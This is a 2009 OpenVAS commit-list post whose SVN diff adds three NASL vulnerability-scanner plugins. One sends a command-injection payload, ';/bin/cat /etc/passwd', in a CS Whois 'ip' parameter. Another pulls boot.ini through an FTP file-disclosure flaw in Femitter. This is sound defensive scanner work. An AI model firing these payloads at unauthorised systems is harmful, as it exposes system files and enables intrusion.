[Openvas-commits] r3198 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Sun Apr 26 20:59:37 CEST 2009 

Author: mime
Date: 2009-04-26 20:59:36 +0200 (Sun, 26 Apr 2009)
New Revision: 3198

Added:
   trunk/openvas-plugins/scripts/cs_whois_34700.nasl
   trunk/openvas-plugins/scripts/femitter_ftp_34689.nasl
   trunk/openvas-plugins/scripts/servit_0_0_3.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
Log:
Added new plugins

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2009-04-25 20:17:58 UTC (rev 3197)
+++ trunk/openvas-plugins/ChangeLog	2009-04-26 18:59:36 UTC (rev 3198)
@@ -1,3 +1,9 @@
+2009-04-26 Michael Meyer <mime at gmx.de>
+	* scripts/cs_whois_34700.nasl,
+	scripts/femitter_ftp_34689.nasl,
+	scripts/servit_0_0_3.nasl:
+	Added new plugins
+
 2009-04-24 Christian Eric Edjenguele <christian.edjenguele at owasp.org>
 	* scripts/remote-detect-Opentaps_ERP_CRM.nasl,
         * scripts/remote-ApacheOfbiz-defaultPwd.nasl,

Added: trunk/openvas-plugins/scripts/cs_whois_34700.nasl
===================================================================
--- trunk/openvas-plugins/scripts/cs_whois_34700.nasl	2009-04-25 20:17:58 UTC (rev 3197)
+++ trunk/openvas-plugins/scripts/cs_whois_34700.nasl	2009-04-26 18:59:36 UTC (rev 3198)
@@ -0,0 +1,107 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# CS Whois Lookup 'ip' Parameter Remote Command Execution
+# Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Michael Meyer
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ script_name(english:"CS Whois Lookup 'ip' Parameter Remote Command Execution Vulnerability");
+ desc["english"] = "
+
+ Overview:
+  CS Whois Lookup and CS DNS Lookup are prone to a remote
+  command-execution vulnerability because the software fails to
+  adequately sanitize user-supplied input.
+
+  Successful attacks can compromise the affected software and possibly
+  the computer. 
+
+ See also:
+  http://www.securityfocus.com/bid/34700
+
+ Risk factor : High";
+
+if (description)
+{
+ script_id(100166);
+ script_bugtraq_id(34700);
+ script_version ("1.0");
+
+ script_description(english:desc["english"]);
+ script_summary(english:"Determine if CS Whois is vulnerable to remote command-execution");
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"Web application abuses");
+ script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
+ script_dependencie("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+dir = make_list("/whois","/cs-whois","/cs-dns", cgi_dirs());
+x = 0;
+
+foreach d (dir)
+{ 
+ url = string(d, "/index.php?ip=;/bin/cat%20/etc/passwd");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
+
+ if( buf == NULL )continue;
+
+ if (egrep(pattern:"root:.*:0:[01]:.*", string: buf) ) 
+   {    
+    if(strlen(d)>0) {   
+        installations[x] = d;
+    } else {
+    	installations[x] = string("/");
+    }	 
+    x++; 
+   }
+}
+
+if(installations) {
+  info = string("High\n\nVulnerable installations were found on the remote host in the following directory(s):\n\n");  
+  foreach found (installations) {
+   info += string(found, "\n");
+  }
+
+  desc = ereg_replace(
+    	string:desc["english"],
+    	pattern:"High$",
+    	replace:info
+    );     
+
+  security_hole(port:port, data: desc);
+  exit(0);
+}
+
+exit(0);


Property changes on: trunk/openvas-plugins/scripts/cs_whois_34700.nasl
___________________________________________________________________
Name: svn:keywords
   + ID

Added: trunk/openvas-plugins/scripts/femitter_ftp_34689.nasl
===================================================================
--- trunk/openvas-plugins/scripts/femitter_ftp_34689.nasl	2009-04-25 20:17:58 UTC (rev 3197)
+++ trunk/openvas-plugins/scripts/femitter_ftp_34689.nasl	2009-04-26 18:59:36 UTC (rev 3198)
@@ -0,0 +1,129 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Acritum Femitter Server Remote File Disclosure Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Michael Meyer
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+################################################################################
+
+desc["english"] = "
+  Overview:
+ 
+   Acritum Femitter FTP Server is prone to a remote file-disclosure
+   vulnerability because it fails to properly sanitize user-supplied
+   input.
+
+   An attacker can exploit this vulnerability to view local files in
+   the context of the server process. This may aid in further attacks.
+
+   Acritum Femitter Server 0.96 and 1.03 are affected; other versions
+   may be vulnerable as well. 
+
+  See also:
+   http://www.securityfocus.com/bid/34689
+
+  Risk factor : Medium";
+
+if(description)
+{
+  script_id(100165);
+  script_bugtraq_id(34689);
+  script_version("1.0");
+  script_name(english:"Acritum Femitter Server Remote File Disclosure Vulnerability");
+  script_description(english:desc["english"]);
+  script_summary(english:"Determine if Acritum Femitter FTP Server is vulnerable to remote file-disclosure");
+  script_category(ACT_GATHER_INFO);
+  script_copyright(english:"Copyright (C) 2009 Michael Meyer");
+  script_family(english:"FTP");
+  script_dependencies("find_service.nes","secpod_ftp_anonymous.nasl","ftpserver_detect_type_nd_version.nasl");
+  script_require_ports("Services/ftp", 21);
+  exit(0);
+}
+
+include("ftp_func.inc");
+
+ftpPort = get_kb_item("Services/ftp");
+if(!ftpPort){
+  ftpPort = 21;
+}
+
+if(get_kb_item('ftp/'+port+'/broken'))exit(0);
+
+if(!get_port_state(ftpPort)){
+  exit(0);
+}
+
+soc1 = open_sock_tcp(ftpPort);
+if(!soc1){
+  exit(0);
+}
+
+domain = get_kb_item("Settings/third_party_domain");
+if(isnull(domain)) {
+ domain = this_host_name();;
+}
+
+user = get_kb_item("ftp/login");
+pass = get_kb_item("ftp/password");
+
+if(!user)user = "anonymous";
+if(!pass)pass = string("openvas@", domain);;
+
+login_details = ftp_log_in(socket:soc1, user:user, pass:pass);
+
+if(login_details)
+{
+  ftpPort2 = ftp_get_pasv_port(socket:soc1);
+  if(ftpPort2)
+  {
+    soc2 = open_sock_tcp(ftpPort2, transport:get_port_transport(ftpPort));
+    if(soc2)
+    {
+      send(socket:soc1, data:'retr \\boot.ini\r\n');
+      result = ftp_recv_data(socket:soc2);
+      close(soc2);
+    }
+  }
+  
+  if(result && egrep(pattern: "\[boot loader\]", string: result)) {
+   info = string("Medium\n\nHere are the contents of the file 'boot.ini' that\nOpenVAS was able to read from the remote host:\n\n"); 
+   info += result;
+   info += string("\n");
+
+   desc = ereg_replace(
+    	string:desc["english"],
+    	pattern:"Medium$",
+    	replace:info
+    );    
+
+   security_warning(port:port,data:desc);
+   ftp_close(socket:soc1);
+   close(soc1);
+   exit(0);
+  }  
+
+ftp_close(socket:soc1);
+close(soc1);
+exit(0);
+
+}
+
+exit(0);


Property changes on: trunk/openvas-plugins/scripts/femitter_ftp_34689.nasl
___________________________________________________________________
Name: svn:keywords
   + ID

Added: trunk/openvas-plugins/scripts/servit_0_0_3.nasl
===================================================================
--- trunk/openvas-plugins/scripts/servit_0_0_3.nasl	2009-04-25 20:17:58 UTC (rev 3197)
+++ trunk/openvas-plugins/scripts/servit_0_0_3.nasl	2009-04-26 18:59:36 UTC (rev 3198)
@@ -0,0 +1,82 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Zervit HTTP Server Malformed URI Remote Denial Of Service
+# Vulnerability
+#
+# Authors
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Michael Meyer
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100167);
+ script_bugtraq_id(34637);
+ script_version ("1.0");
+
+ script_name(english:"Zervit HTTP Server Malformed URI Remote Denial Of Service Vulnerability");
+ desc["english"] = "
+
+ Overview:
+  According to its version number, the remote version of Zervit HTTP
+  server is prone to a denial-of-service vulnerability because it
+  fails to adequately sanitize user-supplied input.
+
+  Attackers can exploit this issue to crash the affected application,
+  denying service to legitimate users.
+
+  Zervit 0.3 is vulnerable; other versions may also be affected. 
+
+ See also:
+  http://www.securityfocus.com/bid/34637
+
+ Risk factor : Medium";
+
+ script_description(english:desc["english"]);
+ script_summary(english:"Determine if Zervit is vulnerable to DoS");
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"Web Servers");
+ script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
+ script_dependencie("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+include("misc_func.inc");
+include("http_func.inc");
+
+port = get_http_port(default:80);
+if(!get_port_state(port)) exit(0);
+if(get_kb_item("Services/www/" + port + "/embedded" ))exit(0);
+
+banner = get_http_banner(port:port);
+if (!banner)exit(0);
+if(!egrep(pattern:"Server: Zervit ([0-9.]+)", string:banner) ) exit(0);
+
+version = eregmatch(pattern: "Zervit ([0-9.]+)", string: banner);
+
+if(version[1] == "0.3") {
+
+ security_warning(port:port);
+ exit(0);
+
+}  
+
+exit(0);


Property changes on: trunk/openvas-plugins/scripts/servit_0_0_3.nasl
___________________________________________________________________
Name: svn:keywords
   + ID

More information about the Openvas-commits mailing list